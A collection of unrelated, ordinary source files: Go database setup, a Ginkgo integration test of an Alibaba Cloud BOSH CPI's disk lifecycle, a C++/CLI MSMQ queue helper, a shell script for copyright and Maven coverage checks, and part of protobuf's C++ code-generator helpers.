// whitespace is ignored, and anything other than "mysql" or "postgres"
// falls back to "sqlite3".
func dealDriver(driver string) string {
	trimmed := strings.TrimSpace(driver)
	if trimmed == "mysql" || trimmed == "postgres" {
		return trimmed
	}
	return "sqlite3"
}
// New opens a *sql.DB described by cfg, defaulting the datasource to the
// local sqlite file "control.db" when blank. Note sql.Open does not dial
// the database; the first use of the pool does.
func New(cfg *Config) (*sql.DB, error) {
	if strings.TrimSpace(cfg.Datasource) == "" {
		cfg.Datasource = "control.db"
	}
	db, err := sql.Open(dealDriver(cfg.Driver), cfg.Datasource)
	if err != nil {
		return nil, err
	}
	db.SetMaxIdleConns(10)               // maximum number of idle connections
	db.SetMaxOpenConns(100)              // maximum number of open connections
	db.SetConnMaxLifetime(time.Hour * 6) // maximum lifetime of a connection
	return db, nil
}
|
<gh_stars>0
/*
* Copyright (C) 2017-2017 Alibaba Group Holding Limited
*/
package integration
import (
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"bosh-alicloud-cpi/mock"
"time"
)
// End-to-end exercise of the disk-related CPI calls: a VM is created to
// attach against, then a disk is created, resized, attached, tagged,
// snapshotted, detached, and deleted, and finally the snapshot and VM are
// cleaned up. Every step must succeed for the spec to pass.
var _ = Describe("integration:disk", func() {
	It("can run the disk lifecycle", func() {
		By("create vm")
		in := mock.NewBuilder(`{
        "method": "create_vm",
        "arguments": [
            "be387a69-c5d5-4b94-86c2-978581354b50",
            "${STEMCELL_ID}",
            {
                "ephemeral_disk": {
                    "size": "40_960",
                    "category": "cloud_efficiency"
                },
                "instance_name": "test-cc",
                "instance_type": "ecs.n4.small",
                "system_disk": {
                    "size": "61_440",
                    "category": "cloud_efficiency"
                }
            },
            {
                "private": {
                    "type": "manual",
                    "ip": "${INTERNAL_IP}",
                    "netmask": "${INTERNAL_NETMASK}",
                    "cloud_properties": {
                        "security_group_ids": ["${SECURITY_GROUP_ID}"],
                        "vswitch_id": "${VSWITCH_ID}"
                    },
                    "default": [
                        "dns",
                        "gateway"
                    ],
                    "dns": [
                        "8.8.8.8"
                    ],
                    "gateway": "${INTERNAL_GW}"
                }
            },
            [],
            {}
        ],
        "context": {
            "director_uuid": "911133bb-7d44-4811-bf8a-b215608bf084"
        }
    }`).P("STEMCELL_ID", stemcellId).
			P("SECURITY_GROUP_ID", securityGroupId).
			P("VSWITCH_ID", vswitchId).
			P("INTERNAL_IP", internalIp).
			P("INTERNAL_NETMASK", internalNetmask).
			P("INTERNAL_GW", internalGw).
			ToBytes()

		r := caller.Run(in)
		Expect(r.GetError()).NotTo(HaveOccurred())
		instCid := r.GetResultString()

		By("create disk")
		diskCid, err := caller.Call("create_disk", 1024, "{}", instCid)
		Expect(err).NotTo(HaveOccurred())

		// Give the cloud provider time to finish provisioning before
		// operating on the new disk.
		By("sleep for awhile")
		time.Sleep(time.Duration(90) * time.Second)

		By("resize disk")
		_, err = caller.Call("resize_disk", diskCid, 30720)
		Expect(err).NotTo(HaveOccurred())

		By("attach disk")
		_, err = caller.Call("attach_disk", instCid, diskCid)
		Expect(err).NotTo(HaveOccurred())

		By("set disk meta data")
		r = caller.Run(mock.NewBuilder(`{
        "method": "set_disk_metadata",
        "arguments": [
            "${DISK_ID}",
            {
                "director": "my-bosh",
                "deployment": "cf",
                "instance_id": "${INST_ID}",
                "job": "consul",
                "instance_index": "0",
                "instance_name": "consul/441e940e-2ffe-4208-993e-3e5f888e2b7e",
                "attached_at": "2017-11-03T06:21:27Z"
            }
        ],
        "context": {
            "director_uuid": "d5555ed6-7688-4aae-9dff-4c4507042f3d",
            "request_id": "cpi-201248"
        }
    }`).P("INST_ID", instCid).P("DISK_ID", diskCid).ToBytes())
		Expect(r.GetError()).NotTo(HaveOccurred())

		By("snapshot disk")
		ssid, err := caller.Call("snapshot_disk", diskCid, nil)
		Expect(err).NotTo(HaveOccurred())

		By("detach disk")
		_, err = caller.Call("detach_disk", instCid, diskCid)
		Expect(err).NotTo(HaveOccurred())

		By("delete disk")
		_, err = caller.Call("delete_disk", diskCid)
		Expect(err).NotTo(HaveOccurred())

		By("delete snapshot")
		_, err = caller.Call("delete_snapshot", ssid)
		Expect(err).NotTo(HaveOccurred())

		By("delete vm")
		_, err = caller.Call("delete_vm", instCid)
		Expect(err).NotTo(HaveOccurred())
	})
})
|
#include <msmq.h>
#include <msmqobj.h>
// Creates the MSMQ queue at `path` if it does not already exist (C++/CLI).
// NOTE(review): both catch blocks currently swallow the error silently, so
// a caller cannot tell creation failed — at minimum the error should be
// logged before this ships.
void EnsureQueueExists(String^ path)
{
    try
    {
        if (!MessageQueue::Exists(path))
        {
            MessageQueue^ queue = MessageQueue::Create(path);
            // Optionally, set queue properties or permissions here
        }
    }
    catch (MessageQueueException^ e)
    {
        // Handle any specific message queue exceptions here
        // For example: log the error, retry, or throw a custom exception
    }
    catch (Exception^ e)
    {
        // Handle any other general exceptions here
        // For example: log the error, retry, or throw a custom exception
    }
}
#!/bin/sh
# Verify that line 2 of every .java file under the current directory starts
# with the expected copyright marker; print the files that do not.
check_headers () {
    EXPECT=" * Copyright (c) "
    LEXPECT=${#EXPECT}
    # Pipe find into a read loop so filenames containing spaces survive
    # (the original `for f in $(find ...)` word-split them), and use
    # `cut -c` instead of the non-POSIX `expr substr`.
    find . -type f -name "*.java" | while IFS= read -r file; do
        line2=$(head -n 2 "${file}" | tail -n 1)
        l2start=$(printf '%s\n' "$line2" | cut -c1-"$LEXPECT")
        if [ "${EXPECT}" != "${l2start}" ]; then
            echo "no copyright notice in: $file"
        fi
    done
}
# Report available dependency/plugin/property updates via the Maven
# versions plugin (read-only; changes nothing).
check_updates () {
    mvn -B -U versions:display-dependency-updates versions:display-plugin-updates versions:display-property-updates
}
# Generate the Cobertura coverage report in its default (HTML) format.
check_coverage() {
    mvn -B cobertura:cobertura
}
# Generate the Cobertura coverage report as XML (for CI consumption).
check_coverage_xml() {
    mvn -B cobertura:cobertura -Dcobertura.report.format=xml
}
# Dispatch on the requested check; anything unrecognized (including no
# argument) prints usage.
case $1 in
    headers)
        check_headers
        ;;
    updates)
        check_updates
        ;;
    coverage)
        check_coverage
        ;;
    coverage_xml)
        check_coverage_xml
        ;;
    all)
        check_headers
        check_updates
        check_coverage
        ;;
    *)
        echo "$0 <which check>"
        echo "checks:"
        echo "   all"
        echo "   headers"
        echo "   updates"
        echo "   coverage"
        echo "   coverage_xml"
        ;;
esac
|
<reponame>sevki/bazel<gh_stars>1000+
// Protocol Buffers - Google's data interchange format
// Copyright 2008 Google Inc. All rights reserved.
// https://developers.google.com/protocol-buffers/
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// Author: <EMAIL> (<NAME>)
// Based on original Protocol Buffers design by
// <NAME>, <NAME>, and others.
#include <google/protobuf/stubs/hash.h>
#include <limits>
#include <map>
#include <queue>
#include <vector>
#include <google/protobuf/stubs/logging.h>
#include <google/protobuf/stubs/common.h>
#include <google/protobuf/compiler/cpp/cpp_helpers.h>
#include <google/protobuf/io/printer.h>
#include <google/protobuf/io/zero_copy_stream.h>
#include <google/protobuf/stubs/strutil.h>
#include <google/protobuf/stubs/substitute.h>
namespace google {
namespace protobuf {
namespace compiler {
namespace cpp {
namespace {

// Name and file of the well-known google.protobuf.Any type; used by the
// IsAnyMessage() helpers below.
static const char kAnyMessageName[] = "Any";
static const char kAnyProtoFile[] = "google/protobuf/any.proto";
// Virtual-path prefix shared by all bundled well-known-type .proto files.
static const char kGoogleProtobufPrefix[] = "google/protobuf/";

// "foo.bar.Baz" -> "foo_bar_Baz": identifier-safe form of a proto name.
string DotsToUnderscores(const string& name) {
  return StringReplace(name, ".", "_", true);
}

// "foo.bar.Baz" -> "foo::bar::Baz": C++ qualified-name form.
string DotsToColons(const string& name) {
  return StringReplace(name, ".", "::", true);
}

// C++ keywords (through C++11) that generated identifiers must not collide
// with; FieldName()/EnumValueName()/SafeFunctionName() append "_" to escape.
const char* const kKeywordList[] = {
  "alignas", "alignof", "and", "and_eq", "asm", "auto", "bitand", "bitor",
  "bool", "break", "case", "catch", "char", "class", "compl", "const",
  "constexpr", "const_cast", "continue", "decltype", "default", "delete", "do",
  "double", "dynamic_cast", "else", "enum", "explicit", "export", "extern",
  "false", "float", "for", "friend", "goto", "if", "inline", "int", "long",
  "mutable", "namespace", "new", "noexcept", "not", "not_eq", "nullptr",
  "operator", "or", "or_eq", "private", "protected", "public", "register",
  "reinterpret_cast", "return", "short", "signed", "sizeof", "static",
  "static_assert", "static_cast", "struct", "switch", "template", "this",
  "thread_local", "throw", "true", "try", "typedef", "typeid", "typename",
  "union", "unsigned", "using", "virtual", "void", "volatile", "wchar_t",
  "while", "xor", "xor_eq"
};

// Builds the keyword lookup set from kKeywordList.
hash_set<string> MakeKeywordsMap() {
  hash_set<string> result;
  for (int i = 0; i < GOOGLE_ARRAYSIZE(kKeywordList); i++) {
    result.insert(kKeywordList[i]);
  }
  return result;
}

// File-scope set, populated once during static initialization; read-only
// afterwards, so concurrent lookups are safe.
hash_set<string> kKeywords = MakeKeywordsMap();

// Returns whether the provided descriptor has an extension. This includes its
// nested types.
bool HasExtension(const Descriptor* descriptor) {
  if (descriptor->extension_count() > 0) {
    return true;
  }
  for (int i = 0; i < descriptor->nested_type_count(); ++i) {
    if (HasExtension(descriptor->nested_type(i))) {
      return true;
    }
  }
  return false;
}

// Encode [0..63] as 'A'-'Z', 'a'-'z', '0'-'9', '_'
char Base63Char(int value) {
  GOOGLE_CHECK_GE(value, 0);
  if (value < 26) return 'A' + value;
  value -= 26;
  if (value < 26) return 'a' + value;
  value -= 26;
  if (value < 10) return '0' + value;
  // After subtracting 2*26 the only remaining legal digit is 10 -> '_'.
  GOOGLE_CHECK_EQ(value, 10);
  return '_';
}

// Given a c identifier has 63 legal characters we can't implement base64
// encoding. So we return the k least significant "digits" in base 63.
template <typename I>
string Base63(I n, int k) {
  string res;
  while (k-- > 0) {
    res += Base63Char(static_cast<int>(n % 63));
    n /= 63;
  }
  return res;
}

} // namespace
// Converts a lower_snake_case proto name to CamelCase. 'cap_next_letter'
// controls whether the first emitted letter is capitalized. Digits pass
// through and force capitalization of the following letter; every other
// non-alphanumeric character (e.g. '_') is dropped and likewise forces
// capitalization.
string UnderscoresToCamelCase(const string& input, bool cap_next_letter) {
  string result;
  // Note: I distrust ctype.h due to locales.
  // Unsigned index: the original 'int i < input.size()' mixed a signed index
  // with an unsigned size (triggers -Wsign-compare).
  for (string::size_type i = 0; i < input.size(); i++) {
    if ('a' <= input[i] && input[i] <= 'z') {
      if (cap_next_letter) {
        result += input[i] + ('A' - 'a');
      } else {
        result += input[i];
      }
      cap_next_letter = false;
    } else if ('A' <= input[i] && input[i] <= 'Z') {
      // Capital letters are left as-is.
      result += input[i];
      cap_next_letter = false;
    } else if ('0' <= input[i] && input[i] <= '9') {
      result += input[i];
      cap_next_letter = true;
    } else {
      cap_next_letter = true;
    }
  }
  return result;
}
// Comment separators emitted between sections of generated source files.
const char kThickSeparator[] =
  "// ===================================================================\n";
const char kThinSeparator[] =
  "// -------------------------------------------------------------------\n";
// Whether a field's default state is all-zero bytes, so the enclosing
// generated message may memset it instead of initializing member-wise.
// Repeated and extension fields never qualify; string/message fields
// (pointer-backed) fall through to the default case and return false.
bool CanInitializeByZeroing(const FieldDescriptor* field) {
  if (field->is_repeated() || field->is_extension()) return false;
  switch (field->cpp_type()) {
    case FieldDescriptor::CPPTYPE_ENUM:
      return field->default_value_enum()->number() == 0;
    case FieldDescriptor::CPPTYPE_INT32:
      return field->default_value_int32() == 0;
    case FieldDescriptor::CPPTYPE_INT64:
      return field->default_value_int64() == 0;
    case FieldDescriptor::CPPTYPE_UINT32:
      return field->default_value_uint32() == 0;
    case FieldDescriptor::CPPTYPE_UINT64:
      return field->default_value_uint64() == 0;
    case FieldDescriptor::CPPTYPE_FLOAT:
      return field->default_value_float() == 0;
    case FieldDescriptor::CPPTYPE_DOUBLE:
      return field->default_value_double() == 0;
    case FieldDescriptor::CPPTYPE_BOOL:
      return field->default_value_bool() == false;
    default:
      return false;
  }
}
// Unqualified generated C++ class name for a message. Nesting is expressed
// by joining parent names with underscores (Outer_Inner); synthetic map
// entry messages get a "_DoNotUse" suffix so user code never names them.
string ClassName(const Descriptor* descriptor) {
  string name;
  const Descriptor* outer = descriptor->containing_type();
  if (outer != NULL) {
    name = ClassName(outer);
    name += "_";
  }
  name += descriptor->name();
  if (IsMapEntryMessage(descriptor)) {
    name += "_DoNotUse";
  }
  return name;
}
// Unqualified generated C++ name for an enum. Enums nested in a message are
// prefixed with that message's class name and an underscore.
string ClassName(const EnumDescriptor* enum_descriptor) {
  const Descriptor* outer = enum_descriptor->containing_type();
  if (outer == NULL) return enum_descriptor->name();
  return ClassName(outer) + "_" + enum_descriptor->name();
}
// Maps a proto package ("foo.bar") to its C++ namespace ("::foo::bar").
// The empty package maps to the empty string (global namespace).
string Namespace(const string& package) {
  return package.empty() ? "" : "::" + DotsToColons(package);
}
// Fully qualified name of the generated default-instance global for a
// message, e.g. "::foo::bar::_MyMsg_default_instance_".
// NOTE(review): this calls a two-argument ClassName(descriptor, bool)
// overload — presumably declared in cpp_helpers.h, distinct from the
// one-argument version defined above; confirm against the header.
string DefaultInstanceName(const Descriptor* descriptor) {
  string prefix = descriptor->file()->package().empty() ? "" : "::";
  return prefix + DotsToColons(descriptor->file()->package()) + "::_" +
      ClassName(descriptor, false) + "_default_instance_";
}
// Name of the generated strong-reference helper function for a message type.
string ReferenceFunctionName(const Descriptor* descriptor) {
  return QualifiedClassName(descriptor) + "_ReferenceStrong";
}
// Base class for generated messages: the full reflective Message when
// descriptor methods are compiled in, otherwise MessageLite.
string SuperClassName(const Descriptor* descriptor, const Options& options) {
  if (HasDescriptorMethods(descriptor->file(), options)) {
    return "::google::protobuf::Message";
  }
  return "::google::protobuf::MessageLite";
}
// Lowercased field name used for accessors/members; a trailing '_' is added
// whenever the lowercase form collides with a C++ keyword.
string FieldName(const FieldDescriptor* field) {
  string name = field->name();
  LowerString(&name);
  const bool clashes_with_keyword = kKeywords.count(name) > 0;
  if (clashes_with_keyword) {
    name += "_";
  }
  return name;
}
// Enum value names keep their original case; a trailing '_' escapes values
// that happen to be C++ keywords.
string EnumValueName(const EnumValueDescriptor* enum_value) {
  const string& name = enum_value->name();
  return kKeywords.count(name) > 0 ? name + "_" : name;
}
// Estimated alignment requirement, in bytes, of the generated member for a
// field: 1/4/8 by scalar width; repeated fields and pointer-backed types
// (string, message) count as 8. Used when ordering members to minimize
// padding. The switch deliberately has no default so the compiler warns if
// a new CppType is ever added.
int EstimateAlignmentSize(const FieldDescriptor* field) {
  if (field == NULL) return 0;
  if (field->is_repeated()) return 8;
  switch (field->cpp_type()) {
    case FieldDescriptor::CPPTYPE_BOOL:
      return 1;
    case FieldDescriptor::CPPTYPE_INT32:
    case FieldDescriptor::CPPTYPE_UINT32:
    case FieldDescriptor::CPPTYPE_ENUM:
    case FieldDescriptor::CPPTYPE_FLOAT:
      return 4;
    case FieldDescriptor::CPPTYPE_INT64:
    case FieldDescriptor::CPPTYPE_UINT64:
    case FieldDescriptor::CPPTYPE_DOUBLE:
    case FieldDescriptor::CPPTYPE_STRING:
    case FieldDescriptor::CPPTYPE_MESSAGE:
      return 8;
  }
  GOOGLE_LOG(FATAL) << "Can't get here.";
  return -1; // Make compiler happy.
}
// Name of the generated kFooFieldNumber constant for a field. If two fields
// share a camelcase name the field number is appended to disambiguate.
string FieldConstantName(const FieldDescriptor *field) {
  string field_name = UnderscoresToCamelCase(field->name(), true);
  string result = "k" + field_name + "FieldNumber";
  if (!field->is_extension() &&
      field->containing_type()->FindFieldByCamelcaseName(
          field->camelcase_name()) != field) {
    // This field's camelcase name is not unique. As a hack, add the field
    // number to the constant name. This makes the constant rather useless,
    // but what can we do?
    result += "_" + SimpleItoa(field->number());
  }
  return result;
}
// Qualified class name of a message-typed field's message type.
string FieldMessageTypeName(const FieldDescriptor* field) {
  // Note: The Google-internal version of Protocol Buffers uses this function
  // as a hook point for hacks to support legacy code.
  return ClassName(field->message_type(), true);
}
// Removes the ".proto" extension (or the legacy ".protodevel" one) from a
// file name; names with neither suffix are returned unchanged.
string StripProto(const string& filename) {
  const char* suffix =
      HasSuffixString(filename, ".protodevel") ? ".protodevel" : ".proto";
  return StripSuffixString(filename, suffix);
}
// C++ type spelling for a primitive CppType; returns NULL for message types
// (callers must handle those separately).
const char* PrimitiveTypeName(FieldDescriptor::CppType type) {
  switch (type) {
    case FieldDescriptor::CPPTYPE_INT32 : return "::google::protobuf::int32";
    case FieldDescriptor::CPPTYPE_INT64 : return "::google::protobuf::int64";
    case FieldDescriptor::CPPTYPE_UINT32 : return "::google::protobuf::uint32";
    case FieldDescriptor::CPPTYPE_UINT64 : return "::google::protobuf::uint64";
    case FieldDescriptor::CPPTYPE_DOUBLE : return "double";
    case FieldDescriptor::CPPTYPE_FLOAT : return "float";
    case FieldDescriptor::CPPTYPE_BOOL : return "bool";
    case FieldDescriptor::CPPTYPE_ENUM : return "int";
    case FieldDescriptor::CPPTYPE_STRING : return "::std::string";
    case FieldDescriptor::CPPTYPE_MESSAGE: return NULL;
    // No default because we want the compiler to complain if any new
    // CppTypes are added.
  }
  GOOGLE_LOG(FATAL) << "Can't get here.";
  return NULL;
}
// Suffix of the WireFormatLite Read/Write method that handles a declared
// field type (e.g. TYPE_SINT32 -> "SInt32" for ReadSInt32/WriteSInt32).
const char* DeclaredTypeMethodName(FieldDescriptor::Type type) {
  switch (type) {
    case FieldDescriptor::TYPE_INT32 : return "Int32";
    case FieldDescriptor::TYPE_INT64 : return "Int64";
    case FieldDescriptor::TYPE_UINT32 : return "UInt32";
    case FieldDescriptor::TYPE_UINT64 : return "UInt64";
    case FieldDescriptor::TYPE_SINT32 : return "SInt32";
    case FieldDescriptor::TYPE_SINT64 : return "SInt64";
    case FieldDescriptor::TYPE_FIXED32 : return "Fixed32";
    case FieldDescriptor::TYPE_FIXED64 : return "Fixed64";
    case FieldDescriptor::TYPE_SFIXED32: return "SFixed32";
    case FieldDescriptor::TYPE_SFIXED64: return "SFixed64";
    case FieldDescriptor::TYPE_FLOAT : return "Float";
    case FieldDescriptor::TYPE_DOUBLE : return "Double";
    case FieldDescriptor::TYPE_BOOL : return "Bool";
    case FieldDescriptor::TYPE_ENUM : return "Enum";
    case FieldDescriptor::TYPE_STRING : return "String";
    case FieldDescriptor::TYPE_BYTES : return "Bytes";
    case FieldDescriptor::TYPE_GROUP : return "Group";
    case FieldDescriptor::TYPE_MESSAGE : return "Message";
    // No default because we want the compiler to complain if any new
    // types are added.
  }
  GOOGLE_LOG(FATAL) << "Can't get here.";
  return "";
}
// Renders an int32 as a C++ literal. kint32min cannot be written as a plain
// decimal literal (gcc rejects it because 2147483648 overflows int), so it
// is spelled as a bit pattern instead.
string Int32ToString(int number) {
  if (number != kint32min) {
    return SimpleItoa(number);
  }
  GOOGLE_COMPILE_ASSERT(kint32min == (~0x7fffffff), kint32min_value_error);
  return "(~0x7fffffff)";
}
// Renders an int64 as a GOOGLE_LONGLONG(...) literal. kint64min gets the
// same bit-pattern treatment as in Int32ToString, since gcc rejects its
// decimal form.
string Int64ToString(int64 number) {
  if (number != kint64min) {
    return "GOOGLE_LONGLONG(" + SimpleItoa(number) + ")";
  }
  // Make sure we are in a 2's complement system.
  GOOGLE_COMPILE_ASSERT(kint64min == GOOGLE_LONGLONG(~0x7fffffffffffffff),
                        kint64min_value_error);
  return "GOOGLE_LONGLONG(~0x7fffffffffffffff)";
}
// C++ source-code expression for a field's default value, suitable for
// pasting into generated code. Handles non-finite floats/doubles via the
// internal Infinity()/NaN() helpers. The switch deliberately has no default
// so the compiler warns when a new CppType is added.
string DefaultValue(const FieldDescriptor* field) {
  switch (field->cpp_type()) {
    case FieldDescriptor::CPPTYPE_INT32:
      return Int32ToString(field->default_value_int32());
    case FieldDescriptor::CPPTYPE_UINT32:
      return SimpleItoa(field->default_value_uint32()) + "u";
    case FieldDescriptor::CPPTYPE_INT64:
      return Int64ToString(field->default_value_int64());
    case FieldDescriptor::CPPTYPE_UINT64:
      return "GOOGLE_ULONGLONG(" + SimpleItoa(field->default_value_uint64())+ ")";
    case FieldDescriptor::CPPTYPE_DOUBLE: {
      double value = field->default_value_double();
      if (value == std::numeric_limits<double>::infinity()) {
        return "::google::protobuf::internal::Infinity()";
      } else if (value == -std::numeric_limits<double>::infinity()) {
        return "-::google::protobuf::internal::Infinity()";
      } else if (value != value) {
        // NaN is the only value that compares unequal to itself.
        return "::google::protobuf::internal::NaN()";
      } else {
        return SimpleDtoa(value);
      }
    }
    case FieldDescriptor::CPPTYPE_FLOAT:
      {
        float value = field->default_value_float();
        if (value == std::numeric_limits<float>::infinity()) {
          return "static_cast<float>(::google::protobuf::internal::Infinity())";
        } else if (value == -std::numeric_limits<float>::infinity()) {
          return "static_cast<float>(-::google::protobuf::internal::Infinity())";
        } else if (value != value) {
          // NaN self-inequality check, as above.
          return "static_cast<float>(::google::protobuf::internal::NaN())";
        } else {
          string float_value = SimpleFtoa(value);
          // If floating point value contains a period (.) or an exponent
          // (either E or e), then append suffix 'f' to make it a float
          // literal.
          if (float_value.find_first_of(".eE") != string::npos) {
            float_value.push_back('f');
          }
          return float_value;
        }
      }
    case FieldDescriptor::CPPTYPE_BOOL:
      return field->default_value_bool() ? "true" : "false";
    case FieldDescriptor::CPPTYPE_ENUM:
      // Lazy: Generate a static_cast because we don't have a helper function
      // that constructs the full name of an enum value.
      return strings::Substitute(
          "static_cast< $0 >($1)",
          ClassName(field->enum_type(), true),
          Int32ToString(field->default_value_enum()->number()));
    case FieldDescriptor::CPPTYPE_STRING:
      return "\"" + EscapeTrigraphs(
        CEscape(field->default_value_string())) +
        "\"";
    case FieldDescriptor::CPPTYPE_MESSAGE:
      return "*" + FieldMessageTypeName(field) +
             "::internal_default_instance()";
  }
  // Can't actually get here; make compiler happy. (We could add a default
  // case above but then we wouldn't get the nice compiler warning when a
  // new type is added.)
  GOOGLE_LOG(FATAL) << "Can't get here.";
  return "";
}
// Convert a file name into a valid identifier: alphanumerics pass through,
// every other byte becomes "_<hex>", so distinct file names always map to
// distinct identifiers.
string FilenameIdentifier(const string& filename) {
  string result;
  // Unsigned index: the original 'int i < filename.size()' compared a signed
  // index against an unsigned size (-Wsign-compare).
  for (string::size_type i = 0; i < filename.size(); i++) {
    if (ascii_isalnum(filename[i])) {
      result.push_back(filename[i]);
    } else {
      // Not alphanumeric. To avoid any possibility of name conflicts we
      // use the hex code for the character.
      StrAppend(&result, "_", strings::Hex(static_cast<uint8>(filename[i])));
    }
  }
  return result;
}
// Name of the per-file namespace holding file-level generated symbols
// (descriptor tables, init functions) for the given .proto file.
string FileLevelNamespace(const string& filename) {
  return "protobuf_" + FilenameIdentifier(filename);
}
// Return the qualified C++ name for a file level symbol: "::pkg::name",
// or "::name" when the package is empty.
string QualifiedFileLevelSymbol(const string& package, const string& name) {
  const string ns = package.empty() ? "" : DotsToColons(package) + "::";
  return StrCat("::", ns, name);
}
// Escape C++ trigraphs by escaping question marks to \?
// (prevents "??x" sequences inside generated string literals from being
// reinterpreted by the preprocessor).
string EscapeTrigraphs(const string& to_escape) {
  return StringReplace(to_escape, "?", "\\?", true);
}
// Escaped function name to eliminate naming conflict.
// Produces prefix+field_name, escaping with "__" when that would collide
// with another field of the message, or with "_" when the bare field name
// is a C++ keyword. The two checks are ordered: a same-name field wins.
string SafeFunctionName(const Descriptor* descriptor,
                        const FieldDescriptor* field,
                        const string& prefix) {
  // Do not use FieldName() since it will escape keywords.
  string name = field->name();
  LowerString(&name);
  string function_name = prefix + name;
  if (descriptor->FindFieldByName(function_name)) {
    // Single underscore will also make it conflicting with the private data
    // member. We use double underscore to escape function names.
    function_name.append("__");
  } else if (kKeywords.count(name) > 0) {
    // If the field name is a keyword, we append the underscore back to keep it
    // consistent with other function names.
    function_name.append("_");
  }
  return function_name;
}
// True if this message, or any message nested inside it, declares a map
// field.
static bool HasMapFields(const Descriptor* descriptor) {
  const int field_count = descriptor->field_count();
  for (int i = 0; i < field_count; ++i) {
    if (descriptor->field(i)->is_map()) return true;
  }
  const int nested_count = descriptor->nested_type_count();
  for (int i = 0; i < nested_count; ++i) {
    if (HasMapFields(descriptor->nested_type(i))) return true;
  }
  return false;
}
// True if any message in the file (at any nesting depth) declares a map
// field.
bool HasMapFields(const FileDescriptor* file) {
  const int n = file->message_type_count();
  for (int i = 0; i != n; ++i) {
    if (HasMapFields(file->message_type(i))) return true;
  }
  return false;
}
// True if this message, or any message nested inside it, defines an enum.
static bool HasEnumDefinitions(const Descriptor* message_type) {
  if (message_type->enum_type_count() > 0) return true;
  const int n = message_type->nested_type_count();
  for (int i = 0; i != n; ++i) {
    if (HasEnumDefinitions(message_type->nested_type(i))) return true;
  }
  return false;
}
// True if the file defines any enum, at top level or nested in a message.
bool HasEnumDefinitions(const FileDescriptor* file) {
  if (file->enum_type_count() > 0) return true;
  const int n = file->message_type_count();
  for (int i = 0; i != n; ++i) {
    if (HasEnumDefinitions(file->message_type(i))) return true;
  }
  return false;
}
// Whether the field's C++ representation is pointer/heap-backed (string or
// message) as opposed to an in-place scalar. The switch deliberately has no
// default so the compiler warns when a new CppType is added.
bool IsStringOrMessage(const FieldDescriptor* field) {
  switch (field->cpp_type()) {
    case FieldDescriptor::CPPTYPE_INT32:
    case FieldDescriptor::CPPTYPE_INT64:
    case FieldDescriptor::CPPTYPE_UINT32:
    case FieldDescriptor::CPPTYPE_UINT64:
    case FieldDescriptor::CPPTYPE_DOUBLE:
    case FieldDescriptor::CPPTYPE_FLOAT:
    case FieldDescriptor::CPPTYPE_BOOL:
    case FieldDescriptor::CPPTYPE_ENUM:
      return false;
    case FieldDescriptor::CPPTYPE_STRING:
    case FieldDescriptor::CPPTYPE_MESSAGE:
      return true;
  }
  GOOGLE_LOG(FATAL) << "Can't get here.";
  return false;
}
// Effective storage type for a string field. The open-source release ignores
// any [ctype = ...] option and always uses plain STRING.
FieldOptions::CType EffectiveStringCType(const FieldDescriptor* field) {
  GOOGLE_DCHECK(field->cpp_type() == FieldDescriptor::CPPTYPE_STRING);
  // Open-source protobuf release only supports STRING ctype.
  return FieldOptions::STRING;
}
// Whether this file is the well-known any.proto itself.
bool IsAnyMessage(const FileDescriptor* descriptor) {
  return descriptor->name() == kAnyProtoFile;
}
// Whether this message is google.protobuf.Any (matched by both its short
// name and its defining file, so a user-defined "Any" does not qualify).
bool IsAnyMessage(const Descriptor* descriptor) {
  return descriptor->name() == kAnyMessageName &&
      descriptor->file()->name() == kAnyProtoFile;
}
bool IsWellKnownMessage(const FileDescriptor* descriptor) {
return !descriptor->name().compare(0, 16, kGoogleProtobufPrefix);
}
// Levels of UTF-8 validation applied to string fields, chosen per file by
// GetUtf8CheckMode() below.
enum Utf8CheckMode {
  STRICT = 0, // Parsing will fail if non UTF-8 data is in string fields.
  VERIFY = 1, // Only log an error but parsing will succeed.
  NONE = 2, // No UTF-8 check.
};
// Which level of UTF-8 enforcement is placed on this file: proto3 always
// checks strictly; proto2 verifies (log-only) unless the file targets the
// lite runtime, which skips checking entirely.
static Utf8CheckMode GetUtf8CheckMode(const FieldDescriptor* field,
                                      const Options& options) {
  if (field->file()->syntax() == FileDescriptor::SYNTAX_PROTO3) {
    return STRICT;
  }
  if (GetOptimizeFor(field->file(), options) == FileOptions::LITE_RUNTIME) {
    return NONE;
  }
  return VERIFY;
}
// Emits the UTF-8 validation call for one string field into 'printer'.
// In STRICT mode the strict_function is used (wrapped in DO_(...) during
// parsing so a failure aborts the parse); in VERIFY mode the log-only
// verify_function is used; in NONE mode nothing is emitted. 'parameters'
// is a printer template expanded against 'variables'.
static void GenerateUtf8CheckCode(const FieldDescriptor* field,
                                  const Options& options, bool for_parse,
                                  const std::map<string, string>& variables,
                                  const char* parameters,
                                  const char* strict_function,
                                  const char* verify_function,
                                  io::Printer* printer) {
  switch (GetUtf8CheckMode(field, options)) {
    case STRICT: {
      if (for_parse) {
        printer->Print("DO_(");
      }
      printer->Print(
          "::google::protobuf::internal::WireFormatLite::$function$(\n",
          "function", strict_function);
      printer->Indent();
      printer->Print(variables, parameters);
      if (for_parse) {
        printer->Print("::google::protobuf::internal::WireFormatLite::PARSE,\n");
      } else {
